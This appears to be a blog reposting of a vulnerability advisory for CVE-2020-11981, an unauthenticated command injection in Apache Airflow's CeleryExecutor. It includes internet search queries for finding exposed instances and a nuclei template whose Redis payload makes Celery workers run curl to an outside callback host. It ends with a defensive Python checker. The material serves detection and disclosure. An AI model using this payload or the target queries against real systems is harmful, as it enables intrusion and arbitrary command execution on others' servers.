Apache Airflow Command Injection Vulnerability

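Vulnerability Information

Vulnerability name: Apache Airflow Command Injection Vulnerability

Vulnerability ID:

  • CVE: CVE-2020-11981

Vulnerability type: Command execution

Severity: Critical

Description: Apache Airflow is an open-source workflow automation tool widely used to orchestrate, schedule, and monitor data pipelines. It supports multiple executors, including CeleryExecutor for distributed task execution. This vulnerability affects Apache Airflow 1.10.10 and earlier: when CeleryExecutor is in use, an attacker who can connect directly to the message broker (such as Redis or RabbitMQ) can inject malicious commands, causing Celery workers to execute arbitrary commands. The root cause is improper validation of user input, which lets an attacker bypass security restrictions by crafting specific messages. An attacker who successfully exploits the vulnerability can execute arbitrary commands on the target system, which may lead to data disclosure, service disruption, or other malicious activity. Because exploitation requires no authentication and can be automated, the security risk is extremely high. Users are advised to upgrade to Apache Airflow 1.10.11 or later as soon as possible to fix the vulnerability.

Vendor: Apache

Product: Airflow

Affected versions: <=1.10.10

Search syntax: product:"redis" || http.title:"airflow - dags" || http.html:"apache airflow" || http.title:"sign in - airflow"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2020%2FCVE-2020-11981.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details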


id: CVE-2020-11981

info:
  name: Apache Airflow <=1.10.10 - Command Injection
  author: pussycat0x, NaN@korelogic
  severity: critical
  description: |
    An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: Upgrade apache-airflow to version 1.10.11 or higher.
  reference:
    - https://github.com/apache/airflow/pull/9178
    - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
    - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
    - https://github.com/t0m4too/t0m4to
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11981
    cwe-id: CWE-78
    epss-score: 0.90015
    epss-percentile: 0.99560
    cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: airflow
    shodan-query:
      - product:"redis"
      - http.title:"airflow - dags" || http.html:"apache airflow"
      - http.title:"sign in - airflow"
    fofa-query:
      - apache airflow
      - title="airflow - dags" || http.html:"apache airflow"
      - title="sign in - airflow"
    google-query:
      - intitle:"airflow - dags" || http.html:"apache airflow"
      - intitle:"sign in - airflow"
  tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp
variables:
  data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
  encode1: '[[["curl", "http://'
  encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
  end: '"}'
tcp:
  - inputs:
      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}"
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a00473045022100f0607764184af7cb47c39f175da5ab162d149de04d38d3c8f31704fdc1c9dfaf02202f486afeba26d345dc626bf8d57a9b763000fe9f6140eed4c984bac7d1528d9c:922c64590222798bb761d5b6d8e72950
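
A defender-side check, added here as an example and not part of the nuclei template or the Airflow code base: it decodes Celery message envelopes in the shape carried by the template's `data` variable and flags `execute_command` messages whose command does not start with the `airflow` CLI. The allow-list prefix, the function names and the sample messages are assumptions constructed for illustration.

```python
import base64
import json

TASK = "airflow.executors.celery_executor.execute_command"
ALLOWED_PREFIX = ["airflow"]  # assumption: legitimate commands invoke the airflow CLI


def classify(raw):
    """Classify one broker message: returns (verdict, command or None)."""
    try:
        envelope = json.loads(raw)
        task = envelope["headers"]["task"]
    except (ValueError, KeyError, TypeError):
        return "malformed", None
    if task != TASK:
        return "other", None
    try:
        body = envelope["body"]
        if envelope.get("properties", {}).get("body_encoding") == "base64":
            body = base64.b64decode(body, validate=True)
        args, _kwargs, _embed = json.loads(body)  # Celery body: [args, kwargs, embed]
        command = args[0]
    except (ValueError, KeyError, IndexError, TypeError, AttributeError):
        return "malformed", None
    if (isinstance(command, list) and all(isinstance(c, str) for c in command)
            and command[:len(ALLOWED_PREFIX)] == ALLOWED_PREFIX):
        return "ok", command
    return "suspicious", command


def sample_envelope(task, command):
    """Constructed sample carrying only the fields classify() reads."""
    body = json.dumps([[command], {}, {"chain": None, "chord": None}])
    return json.dumps({
        "headers": {"task": task},
        "properties": {"body_encoding": "base64"},
        "body": base64.b64encode(body.encode()).decode(),
    })

SAMPLES = [  # constructed inputs, not captured traffic
    sample_envelope(TASK, ["airflow", "run", "example_dag", "t1", "2020-06-01T00:00:00"]),
    sample_envelope(TASK, ["curl", "http://placeholder.invalid"]),
    sample_envelope("example.other_task", ["anything"]),
    "not json",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(classify(raw))
```

The same function can be run over entries read from the broker queue during triage; the template above pushes to the Redis list `default`.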


http://example.com/2025/07/06/github_2777471197/
Author: lianccc
Published: July 6, 2025